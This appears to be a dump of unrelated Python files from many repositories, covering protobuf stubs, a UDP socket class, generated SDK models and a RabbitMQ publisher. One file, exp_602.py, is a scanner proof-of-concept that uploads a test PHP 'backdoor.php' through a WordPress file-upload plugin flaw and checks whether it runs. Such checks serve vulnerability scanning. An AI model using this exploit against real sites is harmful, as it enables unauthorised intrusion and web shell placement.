def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.ConfigList.Configs.Items: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"name",b"name",u"path",b"path"]) -> None: ...
packageId = ... # type: typing___Text
installPath = ... # type: typing___Text
@property
def items(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.ConfigList.Configs.Items]: ...
def __init__(self,
*,
packageId : typing___Optional[typing___Text] = None,
items : typing___Optional[typing___Iterable[Task.ConfigList.Configs.Items]] = None,
installPath : typing___Optional[typing___Text] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Task.ConfigList.Configs: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.ConfigList.Configs: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"installPath",b"installPath",u"items",b"items",u"packageId",b"packageId"]) -> None: ...
hosts = ... # type: google___protobuf___internal___containers___RepeatedScalarFieldContainer[typing___Text]
@property
def configs(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.ConfigList.Configs]: ...
def __init__(self,
*,
hosts : typing___Optional[typing___Iterable[typing___Text]] = None,
configs : typing___Optional[typing___Iterable[Task.ConfigList.Configs]] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Task.ConfigList: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.ConfigList: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"configs",b"configs",u"hosts",b"hosts"]) -> None: ...
class ConfigDiff(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
class Detail(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
class Items(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
path = ... # type: typing___Text
newName = ... # type: typing___Text
oldName = ... # type: typing___Text
def __init__(self,
*,
path : typing___Optional[typing___Text] = None,
newName : typing___Optional[typing___Text] = None,
oldName : typing___Optional[typing___Text] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Task.ConfigDiff.Detail.Items: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.ConfigDiff.Detail.Items: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"newName",b"newName",u"oldName",b"oldName",u"path",b"path"]) -> None: ...
packageId = ... # type: typing___Text
installPath = ... # type: typing___Text
@property
def items(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.ConfigDiff.Detail.Items]: ...
def __init__(self,
*,
items : typing___Optional[typing___Iterable[Task.ConfigDiff.Detail.Items]] = None,
packageId : typing___Optional[typing___Text] = None,
installPath : typing___Optional[typing___Text] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Task.ConfigDiff.Detail: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.ConfigDiff.Detail: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"installPath",b"installPath",u"items",b"items",u"packageId",b"packageId"]) -> None: ...
hosts = ... # type: google___protobuf___internal___containers___RepeatedScalarFieldContainer[typing___Text]
@property
def detail(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.ConfigDiff.Detail]: ...
def __init__(self,
*,
hosts : typing___Optional[typing___Iterable[typing___Text]] = None,
detail : typing___Optional[typing___Iterable[Task.ConfigDiff.Detail]] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Task.ConfigDiff: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.ConfigDiff: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"detail",b"detail",u"hosts",b"hosts"]) -> None: ...
class Batches(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
@property
def targets(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[tuna_service_sdk___model___easy_flow___deploy_target_pb2___DeployTarget]: ...
def __init__(self,
*,
targets : typing___Optional[typing___Iterable[tuna_service_sdk___model___easy_flow___deploy_target_pb2___DeployTarget]] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Task.Batches: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.Batches: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"targets",b"targets"]) -> None: ...
appId = ... # type: typing___Text
appName = ... # type: typing___Text
clusterId = ... # type: typing___Text
clusterType = ... # type: typing___Text
operator = ... # type: typing___Text
org = ... # type: builtin___int
taskTimeStamp = ... # type: typing___Text
configVersion = ... # type: typing___Text
configPackageId = ... # type: typing___Text
needNotify = ... # type: builtin___bool
batchNum = ... # type: builtin___int
batchInterval = ... # type: builtin___int
failedStop = ... # type: builtin___bool
@property
def targetList(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[tuna_service_sdk___model___easy_flow___target_info_pb2___TargetInfo]: ...
@property
def packageList(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[tuna_service_sdk___model___easy_flow___package_info_pb2___PackageInfo]: ...
@property
def configList(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.ConfigList]: ...
@property
def labels(self) -> google___protobuf___struct_pb2___Struct: ...
@property
def configDiff(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.ConfigDiff]: ...
@property
def batches(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.Batches]: ...
def __init__(self,
*,
appId : typing___Optional[typing___Text] = None,
appName : typing___Optional[typing___Text] = None,
clusterId : typing___Optional[typing___Text] = None,
clusterType : typing___Optional[typing___Text] = None,
operator : typing___Optional[typing___Text] = None,
org : typing___Optional[builtin___int] = None,
targetList : typing___Optional[typing___Iterable[tuna_service_sdk___model___easy_flow___target_info_pb2___TargetInfo]] = None,
packageList : typing___Optional[typing___Iterable[tuna_service_sdk___model___easy_flow___package_info_pb2___PackageInfo]] = None,
configList : typing___Optional[typing___Iterable[Task.ConfigList]] = None,
taskTimeStamp : typing___Optional[typing___Text] = None,
configVersion : typing___Optional[typing___Text] = None,
configPackageId : typing___Optional[typing___Text] = None,
labels : typing___Optional[google___protobuf___struct_pb2___Struct] = None,
configDiff : typing___Optional[typing___Iterable[Task.ConfigDiff]] = None,
needNotify : typing___Optional[builtin___bool] = None,
batchNum : typing___Optional[builtin___int] = None,
batchInterval : typing___Optional[builtin___int] = None,
batches : typing___Optional[typing___Iterable[Task.Batches]] = None,
failedStop : typing___Optional[builtin___bool] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Task: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def HasField(self, field_name: typing_extensions___Literal[u"labels",b"labels"]) -> builtin___bool: ...
def ClearField(self, field_name: typing_extensions___Literal[u"appId",b"appId",u"appName",b"appName",u"batchInterval",b"batchInterval",u"batchNum",b"batchNum",u"batches",b"batches",u"clusterId",b"clusterId",u"clusterType",b"clusterType",u"configDiff",b"configDiff",u"configList",b"configList",u"configPackageId",b"configPackageId",u"configVersion",b"configVersion",u"failedStop",b"failedStop",u"labels",b"labels",u"needNotify",b"needNotify",u"operator",b"operator",u"org",b"org",u"packageList",b"packageList",u"targetList",b"targetList",u"taskTimeStamp",b"taskTimeStamp"]) -> None: ...

# ==== path: /tools/pocs/bugscan/exp_602.py | repo: v1cker/kekescan | license: none ====
# -*- coding: utf-8 -*-
from dummy import *
from miniCurl import Curl
curl = Curl()
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'tyq'
# Name: Wordpress Work the flow file upload 2.5.2 Shell Upload Vulnerability
# Refer: https://www.bugscan.net/#!/x/21599
def assign(service, arg):
if service == "wordpress":
return True, arg
def audit(arg):
path = "/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php"
payload = arg + path
filename = "Content-Disposition: backdoor.php"
shell = "<?php echo md5(123)?>"
code, head, res, _, _ = curl.curl('-H \'%s\' -d \'%s\' %s' % (filename, shell, payload))
uploadfile = 'wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php'
code, head, res, _, _ = curl.curl(arg + uploadfile)
if code == 200 and '202cb962ac59075b964b07152d234b70' in res:
security_hole("webshell url:%s" % (arg + uploadfile))
if __name__ == '__main__':
from dummy import *
audit(assign('wordpress', 'http://192.168.121.130/wordpress/')[1])

# ==== path: /Tests/Pedestrian/Pedestrian_AS.py | repo: maxiaoba/MCTSPO | license: none ====
import mcts.AdaptiveStressTestingActionSpace as AST_AS
import mcts.ASTSim as ASTSim
import mcts.MCTSdpw as MCTSdpw
import mcts.AST_MCTS as AST_MCTS
import numpy as np
from Pedestrian.av_simulator import AVSimulator
from Pedestrian.av_reward import AVReward
from Pedestrian.av_spaces import AVSpaces
from mylab.envs.ast_env import ASTEnv
import math
np.random.seed(0)
max_path_length = 50
ec = 100.0
n = 160
top_k = 10
RNG_LENGTH = 2
SEED = 0
reward_function = AVReward()
spaces = AVSpaces(interactive=True)
sim = AVSimulator(use_seed=False,spaces=spaces,max_path_length=max_path_length)
env = ASTEnv(interactive=True,
sample_init_state=False,
s_0=[-0.5, -4.0, 1.0, 11.17, -35.0],
simulator=sim,
reward_function=reward_function,
)
ast_params = AST_AS.ASTParams(max_path_length)
ast = AST_AS.AdaptiveStressTestAS(ast_params, env)
macts_params = MCTSdpw.DPWParams(max_path_length,ec,n,0.5,0.85,1.0,0.0,True,1.0e308,np.uint64(0),top_k)
stress_test_num = 2
if stress_test_num == 2:
result = AST_MCTS.stress_test2(ast,macts_params,False)
else:
result = AST_MCTS.stress_test(ast,macts_params,False)
#reward, action_seq = result.rewards[1], result.action_seqs[1]
print("setp count: ",ast.step_count)
for (i,action_seq) in enumerate(result.action_seqs):
reward, _ = ASTSim.play_sequence(ast,action_seq,sleeptime=0.0)
print("predic reward: ",result.rewards[i])
print("actual reward: ",reward)

# ==== path: /watchtower/_io.py | repo: NelleV/watchtower | license: none ====
import pandas as pd
import os
def _update_and_save(filename, raw, old_raw=None):
"""
"""
if old_raw is not None:
raw = pd.concat([raw, old_raw], ignore_index=True)
if "id" in raw.columns:
subset_column = "id"
elif "sha" in raw.columns:
subset_column = "sha"
else:
raise ValueError("No known column to distinguish subsets")
raw = raw.drop_duplicates(subset=[subset_column])
_save(filename, raw)
def _save(filename, raw):
try:
os.makedirs(os.path.dirname(filename))
except OSError:
pass
raw.to_json(filename, date_format="iso")
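
# Illustrative only (hypothetical file name and frames): merge a fresh frame
# with what is already on disk, deduplicating on the "id" column.
#
#     old = pd.read_json("data/issues.json")
#     _update_and_save("data/issues.json", raw=new_frame, old_raw=old)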

# ==== path: /exps-gsn-edf/gsn-edf_ut=2.5_rd=0.8_rw=0.06_rn=4_u=0.075-0.35_p=harmonic-2/sched=RUN_trial=32/sched.py | repo: ricardobtxr/experiment-scripts | license: none ====
-X FMLP -Q 0 -L 3 85 400
-X FMLP -Q 0 -L 3 62 200
-X FMLP -Q 0 -L 3 61 200
-X FMLP -Q 1 -L 2 55 300
-X FMLP -Q 1 -L 2 54 175
-X FMLP -Q 1 -L 2 35 200
-X FMLP -Q 2 -L 1 32 125
-X FMLP -Q 2 -L 1 25 100
-X FMLP -Q 3 -L 1 25 175
-X FMLP -Q 3 -L 1 22 100
14 150
10 250

# ==== path: /python/baiduads-sdk-auto/test/test_negative_word_packet.py | repo: baidu/baiduads-sdk | license: Apache-2.0 ====
"""
dev2 api schema
'dev2.baidu.com' api schema # noqa: E501
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import baiduads
from baiduads.negativeword.model.negative_word_packet import NegativeWordPacket
class TestNegativeWordPacket(unittest.TestCase):
"""NegativeWordPacket unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testNegativeWordPacket(self):
"""Test NegativeWordPacket"""
# FIXME: construct object with mandatory attributes with example values
# model = NegativeWordPacket() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()

# ==== path: /src/hio/core/udp/udping.py | repo: cellofellow/hio | license: Apache-2.0 ====
# -*- encoding: utf-8 -*-
"""
hio.core.udping Module
"""
import sys
import os
import errno
import socket
from binascii import hexlify

# NOTE: `console` used below is never imported in the original file; it is
# assumed to be ioflo's consoling logger (this module predates hio's own
# logging helpers), so the import here is a best-guess repair:
from ioflo.aid.consoling import console
UDP_MAX_DATAGRAM_SIZE = (2 ** 16) - 1 # 65535
UDP_MAX_SAFE_PAYLOAD = 548 # IPV4 MTU 576 - udp headers 28
# IPV6 MTU is 1280 but headers are bigger
UDP_MAX_PACKET_SIZE = min(1024, UDP_MAX_DATAGRAM_SIZE) # assumes IPV6 capable equipment
class SocketUdpNb(object):
"""
Class to manage non blocking I/O on UDP socket.
"""
def __init__(self,
ha=None,
host='',
port=55000,
bufsize=1024,
wl=None,
bcast=False):
"""
Initialization method for instance.
ha = host address duple (host, port)
        host = '' equivalent to any interface on host
        port = socket port
        bufsize = buffer size
wl = WireLog instance ref for debug logging or over the wire tx and rx
bcast = Flag if True enables sending to broadcast addresses on socket
"""
self.ha = ha or (host, port) # ha = host address duple (host, port)
self.bs = bufsize
self.wl = wl
self.bcast = bcast
self.ss = None #server's socket needs to be opened
self.opened = False
def actualBufSizes(self):
"""
        Returns duple of the actual socket send and receive buffer sizes
(send, receive)
"""
if not self.ss:
return (0, 0)
return (self.ss.getsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF),
self.ss.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF))
def open(self):
"""
Opens socket in non blocking mode.
if socket not closed properly, binding socket gets error
socket.error: (48, 'Address already in use')
"""
#create socket ss = server socket
self.ss = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if self.bcast: # enable sending to broadcast addresses
self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
# make socket address reusable. doesn't seem to have an effect.
# the SO_REUSEADDR flag tells the kernel to reuse a local socket in
# TIME_WAIT state, without waiting for its natural timeout to expire.
# may want to look at SO_REUSEPORT
self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if self.ss.getsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF) < self.bs:
self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.bs)
if self.ss.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF) < self.bs:
self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, self.bs)
self.ss.setblocking(0) #non blocking socket
#bind to Host Address Port
try:
self.ss.bind(self.ha)
except socket.error as ex:
console.terse("socket.error = {0}\n".format(ex))
return False
self.ha = self.ss.getsockname() #get resolved ha after bind
self.opened = True
return True
def reopen(self):
"""
Idempotently open socket
"""
self.close()
return self.open()
def close(self):
"""
Closes socket and logs if any
"""
if self.ss:
self.ss.close() #close socket
self.ss = None
self.opened = False
def receive(self):
"""
Perform non blocking read on socket.
returns tuple of form (data, sa)
if no data then returns (b'',None)
but always returns a tuple with two elements
"""
try:
data, sa = self.ss.recvfrom(self.bs) # sa is source (host, port)
except socket.error as ex:
# ex.args[0] is always ex.errno for better compat
if ex.args[0] in (errno.EAGAIN, errno.EWOULDBLOCK):
return (b'', None) #receive has nothing empty string for data
else:
emsg = "socket.error = {0}: receiving at {1}\n".format(ex, self.ha)
console.profuse(emsg)
                raise  # re-raise the exception
if console._verbosity >= console.Wordage.profuse: # faster to check
try:
load = data.decode("UTF-8")
except UnicodeDecodeError as ex:
load = "0x{0}".format(hexlify(data).decode("ASCII"))
cmsg = ("Server at {0}, received from {1}:\n------------\n"
"{2}\n\n".format(self.ha, sa, load))
console.profuse(cmsg)
if self.wl: # log over the wire rx
self.wl.writeRx(data, who=sa)
return (data, sa)
def send(self, data, da):
"""
Perform non blocking send on socket.
data is string in python2 and bytes in python3
da is destination address tuple (destHost, destPort)
"""
try:
result = self.ss.sendto(data, da) #result is number of bytes sent
except socket.error as ex:
emsg = "socket.error = {0}: sending from {1} to {2}\n".format(ex, self.ha, da)
console.profuse(emsg)
result = 0
raise
if console._verbosity >= console.Wordage.profuse:
try:
load = data[:result].decode("UTF-8")
except UnicodeDecodeError as ex:
load = "0x{0}".format(hexlify(data[:result]).decode("ASCII"))
cmsg = ("Server at {0}, sent {1} bytes to {2}:\n------------\n"
"{3}\n\n".format(self.ha, result, da, load))
console.profuse(cmsg)
if self.wl:
self.wl.writeTx(data[:result], who=da)
return result
PeerUdp = SocketUdpNb # alias
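
if __name__ == "__main__":
    # Loopback smoke test (illustrative, not part of the module): two
    # non-blocking sockets on localhost; the port numbers are arbitrary.
    alpha = SocketUdpNb(ha=("127.0.0.1", 6101))
    beta = SocketUdpNb(ha=("127.0.0.1", 6102))
    alpha.reopen()
    beta.reopen()
    alpha.send(b"hello", beta.ha)
    data, sa = beta.receive()  # may be (b'', None) until the datagram arrives
    alpha.close()
    beta.close()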

# ==== path: /py_solution/p172_factorial_trailing_zeroes.py | repo: dengshilong/leetcode | license: none ====
class Solution(object):
def trailingZeroes(self, n):
"""
:type n: int
:rtype: int
"""
res = 0
while n >= 5:
temp = n // 5
res += temp
n = temp
return res
if __name__ == "__main__":
solution = Solution()
assert solution.trailingZeroes(3) == 0
assert solution.trailingZeroes(5) == 1
assert solution.trailingZeroes(10) == 2
assert solution.trailingZeroes(25) == 6
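    # Worked example (illustrative addition): trailing zeros come from factors
    # of 5 counted with multiplicity, e.g. 100! has 100//5 + 100//25 = 24.
    assert solution.trailingZeroes(100) == 24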

# ==== path: /python/kserve/kserve/models/v1beta1_inference_service_status.py | repo: Suresh-Nakkeran/kserve | license: Apache-2.0 ====
# Copyright 2020 kubeflow.org.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
"""
KServe
Python SDK for KServe # noqa: E501
The version of the OpenAPI document: v0.1
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kserve.configuration import Configuration
class V1beta1InferenceServiceStatus(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'address': 'KnativeAddressable',
'annotations': 'dict(str, str)',
'components': 'dict(str, V1beta1ComponentStatusSpec)',
'conditions': 'list[KnativeCondition]',
'observed_generation': 'int',
'url': 'KnativeURL'
}
attribute_map = {
'address': 'address',
'annotations': 'annotations',
'components': 'components',
'conditions': 'conditions',
'observed_generation': 'observedGeneration',
'url': 'url'
}
def __init__(self, address=None, annotations=None, components=None, conditions=None, observed_generation=None, url=None, local_vars_configuration=None): # noqa: E501
"""V1beta1InferenceServiceStatus - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._address = None
self._annotations = None
self._components = None
self._conditions = None
self._observed_generation = None
self._url = None
self.discriminator = None
if address is not None:
self.address = address
if annotations is not None:
self.annotations = annotations
if components is not None:
self.components = components
if conditions is not None:
self.conditions = conditions
if observed_generation is not None:
self.observed_generation = observed_generation
if url is not None:
self.url = url
@property
def address(self):
"""Gets the address of this V1beta1InferenceServiceStatus. # noqa: E501
:return: The address of this V1beta1InferenceServiceStatus. # noqa: E501
:rtype: KnativeAddressable
"""
return self._address
@address.setter
def address(self, address):
"""Sets the address of this V1beta1InferenceServiceStatus.
:param address: The address of this V1beta1InferenceServiceStatus. # noqa: E501
:type: KnativeAddressable
"""
self._address = address
@property
def annotations(self):
"""Gets the annotations of this V1beta1InferenceServiceStatus. # noqa: E501
Annotations is additional Status fields for the Resource to save some additional State as well as convey more information to the user. This is roughly akin to Annotations on any k8s resource, just the reconciler conveying richer information outwards. # noqa: E501
:return: The annotations of this V1beta1InferenceServiceStatus. # noqa: E501
:rtype: dict(str, str)
"""
return self._annotations
@annotations.setter
def annotations(self, annotations):
"""Sets the annotations of this V1beta1InferenceServiceStatus.
Annotations is additional Status fields for the Resource to save some additional State as well as convey more information to the user. This is roughly akin to Annotations on any k8s resource, just the reconciler conveying richer information outwards. # noqa: E501
:param annotations: The annotations of this V1beta1InferenceServiceStatus. # noqa: E501
:type: dict(str, str)
"""
self._annotations = annotations
@property
def components(self):
"""Gets the components of this V1beta1InferenceServiceStatus. # noqa: E501
Statuses for the components of the InferenceService # noqa: E501
:return: The components of this V1beta1InferenceServiceStatus. # noqa: E501
:rtype: dict(str, V1beta1ComponentStatusSpec)
"""
return self._components
@components.setter
def components(self, components):
"""Sets the components of this V1beta1InferenceServiceStatus.
Statuses for the components of the InferenceService # noqa: E501
:param components: The components of this V1beta1InferenceServiceStatus. # noqa: E501
:type: dict(str, V1beta1ComponentStatusSpec)
"""
self._components = components
@property
def conditions(self):
"""Gets the conditions of this V1beta1InferenceServiceStatus. # noqa: E501
Conditions the latest available observations of a resource's current state. # noqa: E501
:return: The conditions of this V1beta1InferenceServiceStatus. # noqa: E501
:rtype: list[KnativeCondition]
"""
return self._conditions
@conditions.setter
def conditions(self, conditions):
"""Sets the conditions of this V1beta1InferenceServiceStatus.
Conditions the latest available observations of a resource's current state. # noqa: E501
:param conditions: The conditions of this V1beta1InferenceServiceStatus. # noqa: E501
:type: list[KnativeCondition]
"""
self._conditions = conditions
@property
def observed_generation(self):
"""Gets the observed_generation of this V1beta1InferenceServiceStatus. # noqa: E501
ObservedGeneration is the 'Generation' of the Service that was last processed by the controller. # noqa: E501
:return: The observed_generation of this V1beta1InferenceServiceStatus. # noqa: E501
:rtype: int
"""
return self._observed_generation
@observed_generation.setter
def observed_generation(self, observed_generation):
"""Sets the observed_generation of this V1beta1InferenceServiceStatus.
ObservedGeneration is the 'Generation' of the Service that was last processed by the controller. # noqa: E501
:param observed_generation: The observed_generation of this V1beta1InferenceServiceStatus. # noqa: E501
:type: int
"""
self._observed_generation = observed_generation
@property
def url(self):
"""Gets the url of this V1beta1InferenceServiceStatus. # noqa: E501
:return: The url of this V1beta1InferenceServiceStatus. # noqa: E501
:rtype: KnativeURL
"""
return self._url
@url.setter
def url(self, url):
"""Sets the url of this V1beta1InferenceServiceStatus.
:param url: The url of this V1beta1InferenceServiceStatus. # noqa: E501
:type: KnativeURL
"""
self._url = url
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1beta1InferenceServiceStatus):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1beta1InferenceServiceStatus):
return True
return self.to_dict() != other.to_dict()
| [
"[email protected]"
]
| |
2b7a2c90bae671eb7855d16bc122acb73d9dafdc | a16f3f148455395596405fd7b11df62932f3937d | /career/rabbit/send2.py | 8701013073a594d7af24fe5ebb5aa71253c6e7c5 | []
| no_license | wyzane/skill-general | 8eeb5984c42ec2bcb59c634c7f7bca7c2476977b | 6e5a498dd5b63117a6a20aa81ac67a1999d8ac21 | refs/heads/master | 2020-05-22T21:51:18.061659 | 2019-10-18T15:56:26 | 2019-10-18T15:56:26 | 186,535,789 | 0 | 0 | null | 2019-10-18T15:52:54 | 2019-05-14T03:12:39 | Python | UTF-8 | Python | false | false | 619 | py | import sys
import pika
conn = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))
channel = conn.channel()
channel.queue_declare(queue='task_queue',
                      durable=True)  # durable queue: survives a RabbitMQ restart
message = ' '.join(sys.argv[1:]) or "hello world"
channel.basic_publish(exchange='',
routing_key='task_queue',
body=message,
properties=pika.BasicProperties(
                          delivery_mode=2,  # persist the message to disk
))
print("send message: ", message)
conn.close()
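# A minimal matching consumer sketch (added for illustration; not part of
# the original script). Assumes the pika 1.x API and the same durable
# 'task_queue' declared above; run it in a separate process.
def consume_sketch():
    def callback(ch, method, properties, body):
        print("received:", body)
        ch.basic_ack(delivery_tag=method.delivery_tag)  # ack after handling

    c = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))
    ch = c.channel()
    ch.queue_declare(queue='task_queue', durable=True)
    ch.basic_qos(prefetch_count=1)  # fair dispatch: one unacked message each
    ch.basic_consume(queue='task_queue', on_message_callback=callback)
    ch.start_consuming()  # blocks until interrupted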
| [
"[email protected]"
]
| |
57fba70996c5020d941fdc5ac32be0f9eb38101e | e6acc3021714e47345213d13d6344e2d89d4a960 | /streamlit_analytics/__init__.py | 52fbbd335c80c4ce6d68b508bce9a1106a4d77f0 | [
"MIT"
]
| permissive | napoles-uach/streamlit-analytics | 157aa7521647dbe490c75af893361aa6e0ff613b | fe5a7855889a66cf8d6f3eabf8841f5c00e9b492 | refs/heads/main | 2023-03-01T20:42:58.361148 | 2021-01-29T23:32:28 | 2021-01-29T23:32:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 86 | py | __version__ = "0.2.1"
from .main import track, start_tracking, stop_tracking, counts
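# Hedged usage sketch (comments only, so importing the package stays
# side-effect free; `st.button` assumes streamlit is installed):
#
#   import streamlit as st
#   import streamlit_analytics
#
#   with streamlit_analytics.track():   # wrap the app; interactions counted
#       st.button("click me")
#
#   # or use the explicit pair: start_tracking() ... stop_tracking()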
| [
"[email protected]"
]
| |
a51fd66e325e13d07571a0145b88b73ff676b50b | a2d36e471988e0fae32e9a9d559204ebb065ab7f | /huaweicloud-sdk-drs/huaweicloudsdkdrs/v3/model/update_database_object_req.py | 698caaaa0fef8649ba108b232f7219fc181dd69a | [
"Apache-2.0"
]
| permissive | zhouxy666/huaweicloud-sdk-python-v3 | 4d878a90b8e003875fc803a61414788e5e4c2c34 | cc6f10a53205be4cb111d3ecfef8135ea804fa15 | refs/heads/master | 2023-09-02T07:41:12.605394 | 2021-11-12T03:20:11 | 2021-11-12T03:20:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,360 | py | # coding: utf-8
import re
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class UpdateDatabaseObjectReq:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'job_id': 'str',
'selected': 'bool',
'sync_database': 'bool',
'job': 'list[DatabaseInfo]'
}
attribute_map = {
'job_id': 'job_id',
'selected': 'selected',
'sync_database': 'sync_database',
'job': 'job'
}
def __init__(self, job_id=None, selected=None, sync_database=None, job=None):
"""UpdateDatabaseObjectReq - a model defined in huaweicloud sdk"""
self._job_id = None
self._selected = None
self._sync_database = None
self._job = None
self.discriminator = None
self.job_id = job_id
if selected is not None:
self.selected = selected
if sync_database is not None:
self.sync_database = sync_database
if job is not None:
self.job = job
@property
def job_id(self):
"""Gets the job_id of this UpdateDatabaseObjectReq.
        Task ID.
:return: The job_id of this UpdateDatabaseObjectReq.
:rtype: str
"""
return self._job_id
@job_id.setter
def job_id(self, job_id):
"""Sets the job_id of this UpdateDatabaseObjectReq.
        Task ID.
:param job_id: The job_id of this UpdateDatabaseObjectReq.
:type: str
"""
self._job_id = job_id
@property
def selected(self):
"""Gets the selected of this UpdateDatabaseObjectReq.
        Whether to pick objects explicitly. true: migrate only the selected objects; false: migrate everything. Defaults to false when omitted.
